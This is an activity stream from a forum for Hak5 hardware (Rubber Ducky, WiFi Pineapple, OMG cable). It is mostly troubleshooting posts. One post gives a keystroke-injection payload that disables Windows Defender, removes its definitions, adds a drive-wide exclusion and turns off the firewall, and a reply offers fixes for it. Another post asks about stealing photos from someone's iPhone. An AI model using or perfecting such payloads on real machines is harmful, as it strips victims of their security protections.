Jump to content

All Activity

This stream auto-updates

  1. Past hour
  2. Thanks @dark_pyrro for reverting back. Yes I came across this unknown error code 0x80131509 and it is my Windows 11 PC. Dont worry, I have resolved the issue with the help of this article. Mainly the problem was happening for not signing in with the same account in Microsoft store and Xbox app. But per the article's instruction after signing both with the same account and disabling Firewall, when I installed Minecraft Java edition, I did not get any such kind of error code which I was getting. I just now finished the issue and replying. I was not at peace until sharing this experience with you. So..... let's see what happens after that.
  3. I was wondering if its possible to make a usb auto inject code using a linux box. I've seen several demonstrations using visual studio on windows but I dont have access to that computer. Would it be possible to replicate the effects using debian based distros such as ubuntu?
  4. Today
  5. Not really important in terms of getting the payload in general to work, but instead of using the initial delay, you could use the PASSIVE_WINDOWS_DETECT extension since the target is Windows based. Something's missing in this code block. Usually, you need to confirm the elevated terminal/console, but I can't see that here (i.e. "Yes" has to be pressed to get to the elevated prompt). A longer delay is perhaps also needed, but it depends on the performance of the target and how fast it can open the PowerShell window. This shouldn't be necessary since the default ATTACKMODE for the Ducky is ATTACKMODE HID. And, if it wasn't, it still had to be moved to the top of the payload since keystrokes are entered before ATTACKMODE HID is introduced in the payload code. Try running this line manually exactly the way it looks. What is the result? It will cd into the directory, but then just echo the rest of the commands. Remove the quote marks around the commands and try it again. Any difference? A general tip is that if something isn't working, try running it manually and see what the results are. It will help a lot when troubleshooting.
  6. Yesterday
  7. Ok I'm not sure what exactly I've done differently, but all seems to be working now on the ducky. However I haven't been able to disable Windows Defender. The script I used is as follows: ------------------------------------------- DELAY 3000 GUI x DELAY 500 STRINGLN a DELAY 1000 ATTACKMODE HID DELAY 500 REM STAGE 2 Stop Windows Defender Anti Virus******** REM STRINGLN Set-MpPreference -DisableRealtimeMonitoring $true; REM STRINGLN powershell.exe -Command "& {Set-ExecutionPolicy-ExecutionPolicy REM Unrestricted}" DELAY 1000 STRINGLN cd "c:\program files\windows defender"; ".\mpcmdrun.exe -RemoveDefinitions -All Set-MpPreference - Disable!OAVProtection $true"; DELAY 1000 STRINGLN ".\mpcmdrun.exe Add-MpPreference-ExclusionPath c:\"; DELAY 500 STRINGLN Set-MpPreference -DisableRealtimeMonitoring $true; DELAY 1000 STRINGLN netsh advfirewall set allprofiles state off DELAY 1000 STRINGLN Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false DELAY 1000 SHIFT y DELAY 500 ENTER; ----------------------------------------------------- However Windows Defender is still running. Any ideas?
  8. The chipset itself is supported though so it should be transparent regardless what brand it is, some need some tweaking though if they double as a "CD-ROM drive" https://docs.hak5.org/wifi-pineapple/faq/compatible-802.11ac-adapters
  9. That's WiFi 6, isn't it? I have one with the mt7612u chipset, but the adapter isn't officially supported, and it isn't recognized.
  10. You need to provide a lot more info in order to try to help troubleshooting that. What OS? What have you tried this far? What problems are you facing? Any error messages? At what stage in the installation process does the problem(s) occur? etc etc etc...
  11. Hi, I have been having a problem on Minecraft when I am trying to install Minecraft Java edition. I have no idea why this happens. Can anyone please help?
  12. In what way are you connected to the Pineapple? Using one of the APs? Which one in that case? Do you get the same error when connected using the USB-C port of the Pineapple?
  13. Guess you have to install the kmod for the mt7921u chipset (but no guarantees that it will work, I'd recommend using the compatible chipset instead if in need of something other than 2.4 GHz support).
  14. What scripts? It's much easier to try to help troubleshoot things when knowing as much as possible about what's been tried and not. Pick 1 payload that isn't working.
  15. Have you tried? https://payloadstudio.hak5.org/
  16. Hello, I have a mediatek wifi adapter with the chipset being mt7921u, and my pineapple doesn't seem to recognize it on the ui, but when doing lsusb it shows mediatek Inc wireless_device. Any ideas?
  17. Hi, I've just received the rubber ducky and as far as I can tell, the ducky doesn't do a single thing. I've used the payload generator to create the inject.bin file, replaced the inject.bin file on the root of the ducky and tried a number of scripts, but simply nothing happens when I insert the USB. When I press the button, the ducky returns to STORAGE mode and I can see the USB device 'DUCKY'. The LED is constantly green. I'm using Windows 11. What am I doing wrong? Thanks for any help
  18. I have WiFi Pineapple, Mark VII+AC Tactical In my settings, I turned on "Allow management access from all connections", under "Management Access", in the settings. But I get this error when trying to SSH in: ssh root@172.16.42.1 ssh: connect to host 172.16.42.1 port 22: Connection refused How do I open port 22? I don't see a way to change my firewall settings.
  19. Last week
  20. I just purchased a Mark7 pineapple for my business from a Hak5 European vendor and had a surprise when the device short-circuited on first use. The Hak5 vendor does not want to provide support and now it seems that Hak5 also does not provide support because it was purchased from a recommended vendor. Darren if you are reading this, PLEASE do something about this. I need to order a number of Pineapple enterprise devices in the next few weeks for a large customer project, I HOPE Hak5 does stand behind support on products purchased. Dominique
  21. Well, you can start by using Google. NordVPN has instructions on how to set up OpenVPN using CLI on OpenWrt based devices.
  22. nothing ... :( i need to learn to do it
  23. There is perhaps an increased chance of getting an answer if instead posting in the Mark V section of the forums. However, most likely not that many around that has Mark V experience though (or devices to be able to recreate the issue).
  24. Hi . I need help to install OpenVpn in my pineapple mark vii to use with NordVpn . Thank you
  25. Rkiver

    IOS Hack

    https://forums.hak5.org/forum/104-omg-cable/
  26. FreshIce

    IOS Hack

    Would it be possible using the OMG cable to either: A: Backup someone's iPhone to the computer attached on the other end or back it up somewhere else? Or B: Steal the photos off the iPhone once it is unlocked and store said photos somewhere?
  27. Are you sending the HTML file with the file:/// link as an attachment?
  1. Load more activity
×
×
  • Create New...